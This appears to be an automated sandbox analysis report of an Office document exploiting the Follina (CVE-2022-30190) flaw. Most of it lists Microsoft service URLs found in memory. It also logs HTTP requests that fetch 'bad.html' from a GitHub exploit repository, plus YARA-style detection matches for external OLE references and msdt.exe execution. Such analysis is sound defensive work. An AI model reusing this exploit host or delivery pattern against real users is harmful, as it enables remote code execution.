      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:12 GMTVia: 1.1 varnishX-Served-By: cache-mxp6942-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787833.802035,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 171bdafc3cc43db5bb8271a13736edb38baa21b4Expires: Thu, 18 Aug 2022 02:02:12 GMTSource-Age: 7
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.aadrm.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.aadrm.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.office.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.onedrive.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://augloop.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.entity.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cortana.ai/api
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cr.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev.cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://devnull.onenote.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://directory.services.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.windows.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.windows.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://invites.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://lifecycle.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.local
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://management.azure.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://management.azure.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.engagement.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ncus.contentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officeapps.live.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://osi.office.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://otelrules.azureedge.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://roaming.edog.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://settings.outlook.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://staging.cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://tasks.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://wus2.contentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49707 version: TLS 1.2

      System Summary

      barindex
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
